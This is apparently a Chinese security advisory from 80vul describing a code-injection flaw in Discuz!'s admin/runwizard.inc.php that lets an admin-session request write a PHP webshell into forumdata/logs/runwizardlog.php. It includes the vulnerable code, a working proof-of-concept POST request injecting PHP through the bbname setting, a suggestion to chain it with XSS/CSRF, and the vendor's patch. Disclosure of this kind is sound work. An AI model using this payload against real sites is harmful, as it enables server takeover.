Discuz! admin\runwizard.inc.php get-webshell bug

author: 80vul-A
team:http://www.80vul.com

由于Discuz!的admin\runwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞.

一 分析

在文件admin\runwizard.inc.php里代码:

$runwizardhistory = array();
$runwizardfile = DISCUZ_ROOT.'./forumdata/logs/runwizardlog.php';
if($fp = @fopen($runwizardfile, 'r')) {
	$runwizardhistory = @unserialize(fread($fp, 99999));
	fclose($fp);
}

  .......

	if(submitcheck('step1submit')) {
		$runwizardhistory['step1']['size'] = $size;
		$runwizardhistory['step1']['safe'] = $safe;
		$runwizardhistory['step1']['func'] = $func;
		saverunwizardhistory();
	}
	........
	
function saverunwizardhistory() {
	global $runwizardfile, $runwizardhistory;
	$fp = fopen($runwizardfile, 'w');
	fwrite($fp, serialize($runwizardhistory));
	fclose($fp);
}

上面代码可以看出来当有后台权限时,可以直接得到webshell.如果结合xss[如:SODB-2008-01,SODB-2008-02..等] crsf[如:SODB-2008-03]等漏洞,可以直接通过admin身份远程写入webshell执行代码.

二 利用

poc:

POST /bbs/admincp.php?action=runwizard&step=3 HTTP/1.1
Host: www.80vul.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.80vul.com/bbs/admincp.php?action=runwizard&step=2
Cookie: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

formhash=a1ae055f&anchor=&settingsnew%5Bbbname%5D=%3C%3Fphpinfo%28%29%3B%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%CF%C2%D2%BB%B2%BD

webshell:

http://www.80vul.com/bbs/forumdata/logs/runwizardlog.php

三 补丁[fix]

今天发布的dz7 bt版本[1]已经fix这个漏洞了:

function saverunwizardhistory() {
	global $runwizardfile, $runwizardhistory;
	$fp = fopen($runwizardfile, 'w');
	$s = '<?php exit;?>';
	$s .= serialize($runwizardhistory);
	fwrite($fp, $s);
	fclose($fp);
}

[1]:http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip